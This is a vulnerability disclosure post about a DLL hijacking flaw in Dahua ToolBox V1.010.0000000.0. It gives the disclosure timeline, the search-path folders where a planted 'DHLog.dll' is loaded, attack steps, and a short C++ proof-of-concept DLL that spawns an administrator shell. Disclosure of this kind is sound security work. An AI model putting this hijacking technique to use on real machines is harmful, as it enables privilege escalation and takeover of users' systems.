Dahua ToolBox 1.010.0000000.0 DLL Hijacking

`Hi all,  
  
I have actually contacted Dahua PSIRT team and they confirmed the  
vulnerability exists few days ago but then since this product is not in  
that scope on requesting CVE and therefore I am going to disclose the  
details here:  
  
Vulnerable Software and Version:  
ToolBox-V1.010.0000000.0 (versions prior to this are probably vulnerable  
but just tested against V1.010.0000000.0)  
  
Vulnerable software download link:  
https://www.dahuasecurity.com/support/downloadCenter/tools/MaintenanceTools  
  
Date reported to Dahua:  
20 Feb 2022  
  
Date of issue acknowledgement and finding validated from Dahua PSIRT team:  
22 Feb 2022  
  
Description:  
The ToolBox-V1.010.0000000.0 is suffering from DLL hijacking which allows  
arbitrary code execution and even privilege escalation when a malcious dll  
name as "DHLog.dll" is dropped to followng folders during my research, PE  
could be achieved since the exeutable has to be run with administrator  
privilege by design.  
  
Attack vector:  
A malicious x86 dll named as "DHLog.dll" has to be dropped in ANY of the  
following folders, which depends on what softwares have been installed in  
the target windows machine  
  
1. C:\Users\User\AppData\Local\Microsoft\WindowsApps (*Pre-installed in  
every windows)  
2. C:\Users\User\AppData\Local\Programs\Python\Python38\Scripts (Only  
Applicable when users have installed python in their windows machine)  
3. C:\Users\User\AppData\Local\Programs\Python\Python38\ (Only  
Applicable when users have installed python in their windows machine)  
  
PoC code of dll can be found in this repository  
  
Attack steps:  
  
1. Craft and drop a malicious DLL named as "DHLog.dll" with entry point  
DllMain  
2. Double click the executable "ToolBox", administrator privilege is  
required to run  
3. Malicious DLL has been called and an admin shell can be obtained as  
PoC  
4. [image: image]  
<https://user-images.githubusercontent.com/21979646/155094255-095563ec-b353-4a9e-ab91-71c96cdd6366.png>  
  
  
Detail Report can be found here:  
https://github.com/ScriptIdiot/DLL-Hijacking-PoC-of-ToolBox-V1.010.0000000.0  
  
Kindly let me know if further input is required. Thanks!  
  
Kind regards,  
James Tsz Ko Yeung  
  
  
----- poc.cpp -----  
  
// Please compile it as x86  
#include "pch.h"  
#include <Windows.h>  
  
void cmdspawn()  
{  
WinExec("cmd.exe", 1);  
}  
BOOL APIENTRY DllMain( HMODULE hModule,  
DWORD ul_reason_for_call,  
LPVOID lpReserved  
)  
{  
switch (ul_reason_for_call)  
{  
case DLL_PROCESS_ATTACH:  
cmdspawn();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
`